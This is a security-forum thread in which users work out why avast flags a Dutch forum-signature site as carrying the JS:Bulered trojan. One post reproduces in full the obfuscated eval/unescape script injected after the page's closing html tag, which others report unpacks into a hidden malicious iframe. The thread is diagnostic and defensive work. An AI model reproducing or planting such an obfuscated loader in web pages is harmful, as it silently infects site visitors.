JS:Bulered

Hello, recently I’ve been getting a warning about a trojan called JS:Bulered from avast on the following site wXw.forumticker.nl (switch the X to w to visit). Could anyone tell me if that’s true and maybe where the trojan is and how that works? It’s a dutch site, but it’s not supposed to be a malicious site(I know who runs the site). That site provides ticker signatures for forums, and those also trigger the same warning from avast since recently. Is the site hacked or something?

Welcome Filter.

There is a lot of site hacking going on and avast! is alert to this:
http://blog.avast.com/2009/06/25/chameleon_redirectors

Thanks YoKenny.

Could anyone tell me if that’s also the case with wXw.forumticker.nl? Unfortunately I’m not knowledgable enough to look further into this matter, but I’d really appreciate it if anyone else could. Since that site distributes forum signatures the possible trojan reaches a high ammount of people through forums? I’d really appreciate anyone that could help explain the issue of this site. I frequent a forum where alot of people use these signatures, which is my main reason for wanting to know.

Suspicious script outside tag:

<script>var cmgXz350="48czR30c";var eKI9C="Bj75bBj";var R3Op="ar RI47nZ='UJ";var pTchT="gwvgwvg4gwv";var FiZ7SH="J%63UJ%7";var tzKXYUV="gBgwvg78gwvg48g";var DNZ5x="wvg%VeVgwvgwvg9";var A7vxjJ5="Bj52bBj75bBj";var OUHK="v327%Lpzv33B';";var IY2f="%30UJ%2CaUJ%";var AQ75A="s').replace(/";var bRvy0F="9czR3B';";var qI8x="g,'3')));";var tQkox="%3DUJ%2";var xOaJ="vgwvg9";var GTmm="UJ%68UJ%65UJ";var fgit5sYv="69bBj76bBj20bB";pTchT=xOaJ+"gwvgwvg%VeV"+pTchT;var JF5Ylpr="Bj79bBjvEbBj27";var ph25="zR61czR74czR65";var FfMZlw="vgwvg9g";var PpuAu="R64czR6Fc";var pftS="(/wvg/g";var YuJz57="ce(/%6Cj/g,'8";var dh4e8H6="%6CUJ%79UJ%65UJ";var ila7q6d8="J%68UJ%74U";var OkdgH0M="/g,'J%').";FfMZlw="27gwvgwvg8gw"+FfMZlw;var Wj2n="val(unescap";var XwZUnTP5="CaUJ%6BUJ%";var CLkG="4bBj6FbBj6v";var TGoPTi="28bBj52b";var ohM4="bBj52bBj7";var gUlHG="jvCbBj2FbB";var IlM39V="vgwvggwv";var evE0CX="eval(unes";var hXjPG="J%31UJ%27U";bRvy0F="R27czR2"+bRvy0F;dh4e8H6="65UJ%72UJ%66UJ"+dh4e8H6;FiZ7SH+="4UJ%2CaUJ%6";var rLxmX="u7Ea='%Lpzv";var gK2N="wvg2Egwvg73gwvg";YuJz57+="%')));var";var FFlA="(/UJ%/";var JIMDg5Cy="%3AUJ%2FUJ%2FU";var bqZZ="20czR64czR";ila7q6d8+="J%3DUJ%27";var fu59K8D="bBj6Cb";var NvmwGebn="vg74gwvgwvg%Ve";var cNlfN9="75czR6DczR65cz";var wW4pliDx="pzv330";var oeQZJl="jv6bBj";GTmm="8UJ%30UJ%2Ca"+GTmm;YuJz57+=" O2fGgt='gwvgwv";IY2f="J%78UJ%48UJ"+IY2f;var hg8eSQ="wvg78gw";var Q3sDJ="UJ%3BUJ%64U";pTchT="wvgwvg8gw"+pTchT;qI8x+="var EyD";IY2f=Q3sDJ+"J%6CaUJ%6BU"+IY2f;var YwKq="UJ%72UJ%";YuJz57+="g4gwvgw";IY2f="0UJ%27"+IY2f;var ExYZZuY="%74UJ%2CaUJ%";var eSUlC5o="9bBjvDbBjvDbBj";var XghOg="BjvCbBj2FbB";pTchT+="g28gwvgwvg4g";hg8eSQ+="vg48gwvg30gwvg";ExYZZuY="UJ%73UJ"+ExYZZuY;var JCgckOv="j61bBj45bBj69";var hEL8FEus="j52bBj58bB";AQ75A="%Lpz/g,'"+AQ75A;YuJz57=".repla"+YuJz57;oeQZJl="j57bBj58bBj59bB"+oeQZJl;Wj2n="jvB';e"+Wj2n;YwKq="%2FUJ%54"+YwKq;XghOg=oeQZJl+"27bBjvEb"+XghOg;var DfiJdZ="Bj64bBj6FbBj6v";var djiboxsc="74czR28czR27c";hXjPG+="J%3BUJ%64UJ%6";eKI9C+="6DbBj65bBj6Eb";XghOg+="j64bBj69bBj76bB";OUHK="9%Lpzv364%Lpz"+OUHK;tzKXYUV=YuJz57+"vgEgwvgwv"+tzKXYUV;var UhR984pb="aUJ%73U";gK2N+="74gwvg79gwvg";var bfF2RD9="j69bBj4";var CX2nyL="zR2EczR63c";hEL8FEus="72bBj20bBj7vbB"+hEL8FEus;CX2nyL=cNlfN9+"R6EczR74c"+CX2nyL;tzKXYUV=AQ75A+"sv3/g,'%')"+tzKXYUV;var BqVI="6/g,'%'))";var plLb2zuC="7gwvg3Bgw";gK2N=tzKXYUV+"wvg30g"+gK2N;var wOans="replac";DNZ5x="vg2gwvgwvg9gwvg"+DNZ5x;CX2nyL=PpuAu+"zR63czR"+CX2nyL;XghOg+="jvEbBj22bBjvBb";wW4pliDx="7%Lpzv362%L"+wW4pliDx;hEL8FEus+="j6EbBj74bB";var LL5EWZ="Egwvgwvg";var hXysc="g70gwvgwvg5";pftS+=",'6').replace";tQkox+="7UJ%68UJ%74UJ%7";GTmm="J%78UJ%4"+GTmm;var b5FN="vggwvgwvg9gwvg";JCgckOv+="bBj4DbB";Wj2n+="e(CDbc.";var TUvxJqc="v32E%Lpzv36E%";OkdgH0M+="replace(/bBJ%/";var K3sAx="74bBj65";DNZ5x+="gwvg74g";var HjKmEu6="5bBj74b";wOans+="e(/Ca/";var J8asNu="2czR61czR6Dc";evE0CX=hg8eSQ+"29gwvg3B';"+evE0CX;bRvy0F=J8asNu+"zR65cz"+bRvy0F;FiZ7SH=dh4e8H6+"%66UJ%66UJ%65U"+FiZ7SH;var daHjW="var CDbc='";var es0I="zR65czR6DczR";var O5pPNLZ="7%Lpzv37A%Lp";tQkox=UhR984pb+"J%72UJ%63UJ"+tQkox;DfiJdZ="bBj4FbBjvDb"+DfiJdZ;OkdgH0M=Wj2n+"replace(/j"+OkdgH0M;JCgckOv="bBj75bBj4BbB"+JCgckOv;evE0CX="EgwvgwvgBg"+evE0CX;CX2nyL=cmgXz350+"zR3Dcz"+CX2nyL;DfiJdZ=hEL8FEus+"j6CbBj66"+DfiJdZ;hXysc+="gwvgwvgEgwvgwvg";evE0CX+="cape(O2fGgt.";bfF2RD9+="DbBj29bBj";JIMDg5Cy=tQkox+"4UJ%70UJ"+JIMDg5Cy;ExYZZuY+="62UJ%75UJ%";var q3OrnGt="5bBj69bBj4";var tAS7="bBj69bBj4DbBjv";CLkG="27bBjvBbBj6"+CLkG;bRvy0F+="eval(unesca";bRvy0F+="pe(EyDa0e.rep";HjKmEu6+="Bj45bBj6";var T1rscS="'C').re";var TTXPmh2="J%3B';";BqVI=T1rscS+"place(/g"+BqVI;es0I=ph25+"czR45czR6Cc"+es0I;FfMZlw+="wvgwvg4gw";var ztNhGCn0="58bBj59bBj";HjKmEu6+="CbBj65bBj6DbBj";var iWA5="Bj74bBj42bB";CLkG="j79bBjvEbBj"+CLkG;ohM4=fu59K8D+"Bj6CbBj29"+ohM4;bRvy0F+="lace(/";XghOg+="Bj69bBj66bBj28b";var P7YpX6H="bBj6EbBj74bBj";FFlA=wOans+"g,'E').replace"+FFlA;eSUlC5o="2bBj6FbBj64bBj7"+eSUlC5o;FfMZlw+="vgwvg4gw";TTXPmh2=ila7q6d8+"UJ%31UJ%27U"+TTXPmh2;eSUlC5o=eKI9C+"Bj74bBj2EbBj6"+eSUlC5o;OUHK+="eval(unescape(t";O5pPNLZ="v33D%Lpzv32"+O5pPNLZ;hXysc=LL5EWZ+"1gwvg70gwv"+hXysc;XghOg="0bBj55bB"+XghOg;var Y70o="UJ%64UJ%74UJ%68";P7YpX6H+="2EbBj77";bRvy0F=djiboxsc+"zR69czR66czR7"+bRvy0F;plLb2zuC+="vg73gwvg52gwv";FFlA+="g,'%')));";DNZ5x=b5FN+"73gwvgwvg9gwvgw"+DNZ5x;ztNhGCn0="5bBj57bBj"+ztNhGCn0;plLb2zuC="vgEgwvg2"+plLb2zuC;TTXPmh2=GTmm+"%69UJ%67U"+TTXPmh2;var IRD2NJ="bBj28bBj27b";evE0CX=pTchT+"wvgwvg"+evE0CX;OUHK="79%Lpzv35"+OUHK;gK2N=OUHK+"pu7Ea.replace(/"+gK2N;TUvxJqc+="Lpzv361%Lpzv36";iWA5=HjKmEu6+"65bBj6Eb"+iWA5;FfMZlw=DNZ5x+"wvg79gwvg3Dgwvg"+FfMZlw;JIMDg5Cy="30UJ%2C"+JIMDg5Cy;fgit5sYv="j64bBj"+fgit5sYv;YwKq=FiZ7SH+"7UJ%73UJ"+YwKq;IRD2NJ=iWA5+"j79bBj49bBj64"+IRD2NJ;q3OrnGt=ohM4+"5bBj4BbBj61bBj4"+q3OrnGt;es0I=CX2nyL+"zR72czR65c"+es0I;gK2N+="wvg%VeVgwvgwvg5";es0I=bqZZ+"6EczR6BczR78czR"+es0I;TTXPmh2+="eval(unescape";JIMDg5Cy=XwZUnTP5+"78UJ%48UJ%"+JIMDg5Cy;TGoPTi+="Bj75bBj4Bb";JF5Ylpr="bBj6FbBj64b"+JF5Ylpr;var XQlU="zv36Cj4%L";K3sAx=P7YpX6H+"bBj72bBj69bBj"+K3sAx;q3OrnGt+="DbBjvDbBj27b";CLkG=gUlHG+"j62bBj6FbBj64bB"+CLkG;IlM39V=NvmwGebn+"Vgwvgw"+IlM39V;ExYZZuY=JIMDg5Cy+"J%65UJ%78UJ%69"+ExYZZuY;YwKq=ExYZZuY+"74UJ%74UJ%"+YwKq;IRD2NJ="2EbBj67bBj6"+IRD2NJ;plLb2zuC=FfMZlw+"vgwvg5gwvgw"+plLb2zuC;O5pPNLZ=TUvxJqc+"D%Lpzv365%Lpz"+O5pPNLZ;A7vxjJ5="61bBj72bBj20b"+A7vxjJ5;eSUlC5o=XghOg+"Bj64bBj6FbBj6vb"+eSUlC5o;XQlU="zv36B%Lpzv37%Lp"+XQlU;ztNhGCn0=IRD2NJ+"Bj70bBj5"+ztNhGCn0;tAS7=A7vxjJ5+"4BbBj61bBj45"+tAS7;bRvy0F=es0I+"65czR6EczR"+bRvy0F;OkdgH0M+="g,'%').repl";O5pPNLZ=XQlU+"pzv36Cj30%Lpz"+O5pPNLZ;JCgckOv=JF5Ylpr+"bBj2BbBj52"+JCgckOv;qI8x=OkdgH0M+"ace(/v/"+qI8x;q3OrnGt=eSUlC5o+"6EbBj75"+q3OrnGt;BqVI+=");";YwKq=R3Op+"%64UJ%6"+YwKq;ztNhGCn0="65bBj6EbBj74bBj"+ztNhGCn0;YwKq=bRvy0F+"czR/g,'%')));v"+YwKq;pftS=evE0CX+"replace"+pftS;IY2f=YwKq+"6FUJ%7"+IY2f;fgit5sYv=tAS7+"DbBj22bBjvCbB"+fgit5sYv;IlM39V=plLb2zuC+"g58gwvgwvgEgw"+IlM39V;IlM39V=gK2N+"gwvg2Egwvg7w"+IlM39V;bfF2RD9=TGoPTi+"Bj61bBj45bB"+bfF2RD9;hXysc=IlM39V+"g4Fgwvg2"+hXysc;qI8x=ztNhGCn0+"v6bBj27bBj29bB"+qI8x;q3OrnGt="BjvDbBj27bBj7"+q3OrnGt;hXysc=wW4pliDx+"%Lpzv339%Lpzv3"+hXysc;JCgckOv=q3OrnGt+"BjvCbBj62"+JCgckOv;O5pPNLZ=rLxmX+"364%Lpzv36E%Lp"+O5pPNLZ;Y70o=IY2f+"77UJ%69"+Y70o;TTXPmh2=hXjPG+"CaUJ%6BU"+TTXPmh2;JCgckOv=fgit5sYv+"j69bBj64b"+JCgckOv;TTXPmh2=Y70o+"UJ%3DUJ%27U"+TTXPmh2;CLkG=JCgckOv+"j2BbBj27bB"+CLkG;hXysc=O5pPNLZ+"zv37%Lpzv36Cj5"+hXysc;hXysc=FFlA+"var tp"+hXysc;K3sAx=CLkG+"bBj75bBj6DbBj65"+K3sAx;DfiJdZ=bfF2RD9+"vBbBj76bBj61bBj"+DfiJdZ;BqVI=pftS+"(/%VeV/g,"+BqVI;hXysc=TTXPmh2+"(RI47nZ."+hXysc;qI8x=DfiJdZ+"bBj75bBj6DbBj"+qI8x;qI8x=K3sAx+"bBj20bBj"+qI8x;qI8x=daHjW+"bBj76bBj"+qI8x;qI8x+="a0e='czR76czR";hXysc=qI8x+"61czR72czR"+hXysc;BqVI=hXysc+"4gwvg43g"+BqVI;eval(BqVI);</script><script>check_content()</script>

Thanks! So that is probably the actual problem?
If I contact the owner of that site, what would I need to tell him?
Is it just that script that is the problem or also how the script got on there?

  • This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Thanks DavidR, it’s not my site though, but thanks :slight_smile:

Did you check the site wXw.forumticker.nl? I’d like another opinion on it, because the moderator on that forum claims it’s a false positive because his nod32 doesn’t find anything. Already told him avast has a better web shield, but I’d like a second opinion on it.

Hi Filter,

As .: L’ arc :. already said there is a suspicious script outside the html block (right at the bottom, after the closing html tags)
This is wrong and should not be there.

You could advise the webmaster of this thread, tell them to look at the source code them selves, and show them this link:

http://www.UnmaskParasites.com/security-report/?page=www.forumticker.nl

-Scott-

It is most certainly hacked, there are very few AVs even looking for this much less able to detect and avast is all over them like a rash.

There is a huge block of obfuscated javascript after the closing html tag, a standards no, no, so it is highly unlikely that it is there by design.

This script tag is all on a very long single line, see image, I have broken it down to give a better idea of what it looks like.

Need another opinion?
Seems an infected script as posted by .: L’ arc :.

Ha filter,

Ja dit is een groeiend probleem, software of script op websites die kwetsbaar blijken voor exploits.
Wellicht een oudere versie van Joomla daar. De web-admins zijn er niet al te alert op en merken niet dat ze hun gebruikers via hun browser bezoekjes besmetten. Een ander voorbeeldje van een dergelijke besmetting: http://forum.avast.com/index.php?topic=46176.0
Het weghalen van de malcode helpt niet zomaar, de kwetsbaarheid die de hackers toegang verschafte moet verdwijnen, dat kan een PHP kwetsbaarheid zijn, zoals hier een oudere versie van gebruikte website software of oude meuk waar de webadmin niet van weet dat het exploitable is, ook de hoster dient zijn gebruikers te beschermen tegen deze massale hacks,

groetjes,

polonus

Thanks everybody for your swift help :slight_smile: I have passed on all the information you provided me, should be more than enough! So, thanks again.

@ Polonus:

Bedankt, toevallig had ik dat topic al gelezen, vond het al erg veel gelijkenis tonen met dit geval. Ik denk dat dit ook zeker een geval is van verouderde software. Ik was vooral verbaasd dat ik de enige ben die het opmerkte door avast. Ik gebruik avast al zo lang zonder problemen dat ik bijna zou vergeten wat voor troep vele andere mensen gebruiken, hehe.

You’re welcome, good luck.

Apparently, he put that code there himself :-
He says in that code is all the information that goes into the ticker signatures.

But just the strange placement of that code shouldn’t set off avast though? Or does it and is it a false positive?

I guess, it wont be easily set as false positive, the location of script is different from what should be.

Sophos detected the said script as an infection too.

http://www.virustotal.com/analisis/eb76a862b807bdec69a5e4e85062121dd523103ac35142cccf910bbf66170dbe-1248088861

Sophos detects it as suspicious behaviour but not so much as an infection, probably because of the wrong placement.
The code is in the wrong place, but that only seems to be because he doesn’t have enough knowledge on where to put it.
Still feel that on itself shouldn’t be enough to set off avast for a trojan though? Ahh well.

This is not a false positive!! I’m pretty sure hes not the creator of this script - it is infection. After unpacking that huge script (3 layers) you will see an iframe creation with malicious target url.

If he says that the code contains some info, then I ask what info? There is just one malicious iframe.

Regards

BS

I’m sorry but there is NO reason to put ANY code outside of the html tags, and obfuscate it too
That spells disaster, even before it is actually malicious, which incidently it is.

Is he looking at the source code at all, let alone the right part ???

But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
Correct me if I'm wrong but avast is not alerting to the strange placement, it is alerting to the actual content, which [b]jsetko[/b] has explained.

-Scott-

No reasons to bash but, I believe, it is on the website author’s side where the move must be done [modify the source code] rather than avast set it as a false positive.

avast has no fault of the script being placed outside the tag.

The way he handled it yesterday didn’t make sense to me in the first place. He just brushed it off, seemed like he had no idea what I was talking about. I agree it’s his move though, but I’m not giving up this easily :stuck_out_tongue: Other cases on this forum concerning JS:Bulered were exactly the same as this one. Thanks again guys for the help, I appreciate it :slight_smile: I’ve passed the info on that you provided jsetsko, thanks. I think he’s probably talking about another script or something.